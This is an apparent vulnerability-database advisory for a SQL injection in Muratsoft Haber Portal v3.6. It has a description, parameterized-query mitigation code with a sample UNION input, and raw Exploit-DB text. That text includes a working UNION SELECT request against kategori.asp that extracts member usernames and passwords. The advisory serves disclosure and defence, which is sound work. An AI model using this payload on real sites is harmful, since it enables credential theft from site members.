Vendor: Haber Portal
By: ASIANEAGLE
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Haber Portal
Affected Version From: 3.6
Affected Version To: 3.6
Patch Exists: NO
Related CWE: N/A
CPE: a:muratsoft:haber_portal
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Year: 2006

Muratsoft Haber Portal v3.6 (tr) SQL Injection Vulnerability

An attacker can exploit a SQL injection vulnerability in Muratsoft Haber Portal v3.6 (tr) by sending a specially crafted HTTP request to the vulnerable application. By exploiting this vulnerability, an attacker can gain access to the database and execute arbitrary SQL commands.

Mitigation:

Developers should always use parameterized queries, also known as prepared statements, when interacting with the database. Additionally, input validation should be performed to ensure that untrusted data is not being used to construct SQL commands.
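
An added example of the mitigation above (not code from the advisory or from Muratsoft), in Python with an in-memory SQLite database standing in for the portal's backend. The `uyeler` column names are taken from the request in the advisory; the `haberler` table, the function names and every row are constructed for illustration.

```python
import sqlite3

# UNION shape from the advisory, cut down to the two columns of the constructed query.
UNION_INPUT = "-1 union select U_ADI, U_SIFRE from uyeler where U_ID like 1"

def make_db():
    """Constructed stand-in for the portal database; the schema is an assumption."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE haberler (id INTEGER, kat INTEGER, baslik TEXT);  -- hypothetical
        CREATE TABLE uyeler (U_ID INTEGER, U_ADI TEXT, U_SIFRE TEXT);
        INSERT INTO haberler VALUES (1, 3, 'Sample headline');
        INSERT INTO uyeler VALUES (1, 'admin', 'constructed-secret');
    """)
    return db

def news_vulnerable(db, kat):
    # Before: the request value is concatenated into the SQL text and parsed as SQL.
    sql = "SELECT id, baslik FROM haberler WHERE kat = " + kat
    return db.execute(sql).fetchall()

def news_parameterized(db, kat):
    # Prepared statement: the value is bound after parsing, so it is only ever data.
    sql = "SELECT id, baslik FROM haberler WHERE kat = ?"
    return db.execute(sql, (kat,)).fetchall()

def parse_category(kat):
    # Input validation: a category id is a short run of ASCII digits and nothing else.
    if not (kat.isascii() and kat.isdigit() and len(kat) <= 9):
        raise ValueError("invalid category id")
    return int(kat)

def news_hardened(db, kat):
    # After: validate first, then bind the validated integer as a parameter.
    return news_parameterized(db, parse_category(kat))

if __name__ == "__main__":
    db = make_db()
    print("concatenated :", news_vulnerable(db, UNION_INPUT))    # member row is returned
    print("parameterized:", news_parameterized(db, UNION_INPUT)) # no rows match
    try:
        news_hardened(db, UNION_INPUT)
    except ValueError as exc:
        print("validated    :", exc)                             # rejected before the query
    print("normal input :", news_hardened(db, "3"))
```

In Classic ASP, which the portal is written in, the same binding is done with an `ADODB.Command` object and its parameters rather than string concatenation.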

Exploit-DB raw data:

#Muratsoft Haber Portal v3.6 (tr) SQL Injection Vulnerability
#Author : ASIANEAGLE
#Site   : www.asianeagle.org
#Contact: admin@asianeagle.org


#Link           : http://www.aspindir.com/Goster/4350
#Demo Portal    : http://www.muratsoft.com/haber/www/
#Price of Portal: 300YTL // Good money for Bad Script

#Exploit : 
 www.site.com /[portal path]/kategori.asp?kat=-1%20union%20select%200,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13,14%20from%20uyeler%20where%20U_ID%20like%201

#BURCU, I have always loved you and I always will.

# milw0rm.com [2006-09-03]